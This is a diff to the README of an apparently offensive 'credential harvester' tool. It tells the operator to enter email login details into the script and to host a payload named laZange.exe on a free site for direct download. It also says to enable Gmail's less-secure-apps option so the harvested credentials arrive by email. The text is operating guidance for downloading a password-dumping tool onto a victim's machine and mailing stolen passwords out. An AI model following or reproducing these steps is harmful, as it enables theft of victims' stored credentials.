gouthamk-cryptichub/CREDENTIAL_harvester/README.txt

 Edit line 30 with sender's email, password, receivers email (Both mailID can be same)

 **NOTE
->Host the payload online in free sites and use the direct download URL in line 25 of the program
+>Host the payload online in free sites and use the direct download URL in line 25 of the program (laZange.exe)
+>enable lesssecureapps option in the senders google acc. (https://myaccount.google.com/lesssecureapps)
 >you vil vil receive a mail and if in case the mail is empty follow the below steps
     ->Options->Show Original